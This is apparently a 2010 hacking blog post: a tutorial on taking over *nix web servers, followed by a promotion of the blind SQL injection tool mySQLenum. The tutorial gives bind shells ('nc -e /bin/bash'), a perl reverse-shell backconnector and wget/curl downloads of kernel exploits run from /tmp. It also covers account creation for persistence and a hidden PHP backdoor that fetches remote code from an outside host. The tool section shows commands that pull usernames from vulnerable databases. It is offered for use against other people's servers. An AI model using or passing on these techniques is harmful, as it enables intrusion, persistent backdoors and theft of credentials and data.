Rooting basics
June 1, 2010[ Gaining Root Access ]
[ The Basics of rooting a server ]
[x] What would I expect from this tutorial?
- This tutorial is to show you the easy ways of gaining root access to a *nix server.
most people think its quiet hard to do so, well I am trying to prove the opposite.
[x] I am interested, go on…
- Okay, you should know atleast some basics of webhacking, to gain access to the server you want to root.
if you have no idea, or never gained access to a server before, I suggest you read some WebHacking tutorials.
I will start with some of the things you need to know in order to start rooting servers::
- Using a shell, have a good background on *nix commands, and know your way around a *nix server.
[ You can learn all that locally, by just installing a *nix distro, and playing around with it. ]
- How to use NetCat, and listen / connect to servers using it.
[ I will cover that in this tutorial ]
- as mentioned earlier, you must have atleast the basics of webhacking covered, how to gain access to a server. etc..
[ Read some WebHacking tutorials, I made a very basic one with alot of examples covering the most used attacking vectors ]
Those are the basic requriements that you should cover before starting reading this tutorial, if you feel you got one missing, lookup some tutorials on it, or you can ask me
[x] How much access you have?
- You cant just root a server if you have a XSS on that server, unless you take that XSS to the extreme and phish with it, but thats another story.
so, we need atleast ability to upload / download / include our code, or even just exeucute it.
Once we got the ability to execute commands on that server, we start checking for things, this is my own checklist that I do on every server. its just a habit now::
Check the /etc/passwd file for the users with SSH access, how do I know which have and which does not?
simple, by using `cat` to get the contents of that file, you will see the users on the server in this form:
user:*:501:502:x:/home/user:/bin/bash
[1] [2] [3]
[1] - The usersname | good for us to know the user to be used on cPanels, FTPs, and SSH…
[2] - Home of that username | good for cross server hacks, where you need to get to that users files.
[3] - Shell access | If it was anything other than :
Quote
/bin/sh
/bin/bash
/bin/zsh
Most probably it means no shell / SSH access for that user.
Now, why are we looking for users with SSH access?
Because it would make it much easier to work on that server with SSH access, to execute commands faster etc..
Now lets say the user `user` got SSH access, we can go to his `home` and look for config files, passwords, backups, anything that will have a password.
and then try it on SSH, with the user `user` and the pass that we found, if you are lucky, you will get access
[ Not going to explain what to do next, cause we still need to complete the checklist ]
Allright, so none of the users got SSH access… we cant just give up now can we?
If the hosting company is not that big, or if it was a private server, VPS, dedicated server, most likely the main site of the hosting is on the same server…
that is a great thing to have, so we do a simple WHOIS on the server, and check out the host, and then try to find the home dir…
Now most hosting, will have a billing software, or some system check panels, etc. all of those needs a high user access to the server, so in most cases you will find the password of admin access in plaintext,
we will be looking for config files, how to do so?
well, we moved to the hosts home right, lets check there files…
by listing the files there, we can see they have a folder called `billing`, lets check that out…
the first step, is to get the contents of the index, and look for the included files, most cases its just clear that this file is a config file from the name.
it will be something like:
<?php include('config.php'); ?>
or
<?php include('connection/db.php'); ?>
or
<?php include('includes/conf.php'); ?>
by getting the contents of that file, we can get the password, and try it on that user, on SSH, cPanel, FTP.
[ No luck… next… ]
The hosting company has there files on another server, there are no backups whatsoever, and you are getting desprete by now…
NetCat comes to the rescue!, NetCat the TCP/IP swiss army knife should be always in your pocket `flash drive or whatever you use`, it is very usefull..
as I promised, I will explain about the usage of NetCat.. so here we go::
[ Windows ]
After downloading NetCat, open up your CMD, and move to the dir that it is located.
The commands you would need are:
nc -vv -l -p 5555
This will make NetCat listen on port 5555, verbosely `telling you exactly what is going on`. that simple eh?
nc -vv -L -p 5555
Same thing, but with a capital L, makes it listen and once disconnected, listen again, and again.. etc…
nc darkmindz.com 80
Connect to darkmindz.com on port 80.
nc -vv -l -p 5555 -e cmd.exe
Okay, you dont want to do that on your own PC, this would listen on port 5555, and once someone connects, it would open up cmd for them…
[ Thats all you need to know about NetCat for now ]
[ *nix ]
Downloaded NetCat, compiled it, and ready to go…
same commands, now the only difference is, since most webservers are *Nix, you will need to use it as a `backdoor`, by using this command:
./nc -vv -l -p 5555 -e /bin/bash
once connected, you got a bash command line on that server
allright, where does that leaves us.. we still need to get a better way to execute commands on the server, and all our trials to get SSH access failed…
Now we are going to move into, Backconnecting and Backdooring…
[ Backconnecting ]
A simple definition would be:
Making the server connect to you.
Limitations:
If the server was firewalled, or had some kind of security against remote connections, you cant use that method…
How-To:
Well, you can code your own backconnector, it is not that hard, if you know C or Perl. but if you dont, you can always use the lots of backconnectors out there.
The most used tool, `atleast by me`, is the iranian backconnnector, and the cyberlab. both are in perl, and both work like a charm.
ofcourse perl should be installed on that server to be able to use those, if perl is installed, all you need to do is::
use NetCat on your PC to listen to a port…
nc -vv -l -p 5555
then, on that server, follow the instructions of your backconnector, most likely it is::
perl shos.pl your_ip_here 5555
if it connected, you will see it on your screen, saying connected, and you can start executing commands
otherwise, you can try a C backconnect tool.. same concept, just compile and run…
[ Backdooring ]
Backdooring, is opening a port on the server, to connect to…
You can use NetCat in this case, and run the command:
./nc -vv -l -p 5555 -e /bin/bash
then connect to the server using NetCat.. done..
or use some bind shells, wont work on alot of servers, they started banning the process… but if it works, great!
[x] So, we have been talking about how to get more access to execute commands all day now, whats next?!
Right, so backups were not found, host is not on the same server, and if it was, all the passwords are either invalid or encrypted.
Now we move into some kernel exploits, and using the server to the max.
atleast by now, you should have a command line access, SSH, Backconnect, Backdoor, whatever it was…
so now you can easily execute commands on the server, but what would you do exactly?
Now its time to get info on the server, kernel, processes, services, and then look for vulnerabilities.
we always start by the kernel, so get the kernel version by:
uname -a
it would output the hostname, OS, and then the kernel version, now we need to find an exploit for that kernel..
a good website for kernel exploits is: http://melol.free.fr/local/
lets say you found the kernel exploit, now we need to run it, how?
lets move to a dir that no one usually look in it, and that is /tmp/.
now, we are going to download that exploit, we can use wget for that:
wget http://melol.free.fr/local/the_name
if it says /bin/wget access denied, dont worry, we can always cURL:
curl http://melol.free.fr/local/the_name -o new_name
if that doesnt work either, remember your shell? well use it to upload that exploit in /tmp/.
before running it, check if its compiled or not, you can check that by viewing the source code.
if it was not compiled, `most probably the extension would be .c`, then you need to compile it:
gcc name.c -o new_name
now to run it, we first need to give it execution perms, so we chmod it to 777
chmod 777 new_name
allright, now lets hope this works and run it..
./new_name
you can check if it works by checking your id, or whoami, and if it says root. you are good to go
allright, we covered the basic basics of getting root on a server, rooting is not that hard, some attacking methods are hard, like BoF’s, you need C knowledge to be able to debug and exploit the processes…
[x] I dont want to loose the root!!
No one does, but alot makes stupid mistakes that will take the root away from them…
Rule #1 and the most important is : You NEVER change the roots pass, NEVER EVER!
Create a new user, with SSH access. check the useradd command for more info.
If you used a local root exploit, make sure you have other copies of it on that server, you might need it again.
Backdoor every single site on the server, with a simple PHP-Shell backdoor:
<?php $config_x = $_SERVER['HTTP_USER_AGENT']; if($config_x == "myb4ckd00r") { @include('http://www.darkmindz.com/shell/x2300.txt'); } ?>
Use bind shell backdoors too, you can download a good collection of backdoors from DarkMindZ.com.
The backdoors will need you to compile them, and that is a general *nix knowledge, so if you still dont know how to use them, you are not ready to start rooting. until you know your way around *nix.
This is the end of this tutorial, I hope you liked it
mySQLenum – Automatic blind sql injection tool
mySQLenum is a command line automatic blind sql injection tool for web application that uses MySql server as its back-end. Its main goal is to provide an easy to use command line interface.
Coded in pure c, does not depends on external library, is fast and support all MySQL versions.
It is easy and simple to use, all web application develops who use database can use this tool to simply run and find known vulneability.
 |
Click this bar to view the full image. |
Five necessary parameters:
–url: target URL
–sql-query: sql query to execute (or –macro to enter in Macro mode)
–param: vulnerable parameter
–param-value: a valid value to assign to parameter
–match-string: string to match in page content when the query is valid
How to use mySQLenum
mysqlenum –url=”http://www.oneexample.com/page.php” –sql-query=”select username from users” –param=page_id –param-value=1 –match-string=”Articolo 22″ –http-auth=”user:P4ssw0rd”
Query: select username from users
1) root
2) local
3) marco
4) luca
5) —
> Total requests: 192
> Data sent: 40 Kb
> Data received: 862 Kb
When above five parameter is not provided it automaticaly assumes.
- the request type is GET
- the webserver port is 80
- the charset used during the enumeration is included between – the ASCII values 32 and 122
we can use the CONCAT function to enumerate more fields with only one query:
One more macro mode example.
interactive Macro mode is possible to automatically enumerate:
- all available databases
- all tables of a specific database
- all fields of a specific table
the macro mode requires that the INFORMATION_SCHEMA is accessible.
mysqlenum –url=”http://www.example.com/page.php” –macro –param=page_id –param-value=1 –match-string=”Articolo 22″
Available macros:
1) Databases enumeration
2) Tables enumeration
3) Fields enumeration
Your choice: X
Databases:
1) information_schema
2) site
3) —
> Total requests: 227
> Data sent: 62 Kb
> Data received: 1066 Kb
Operating system supported
*nix Systems
Download mysqlenum Here
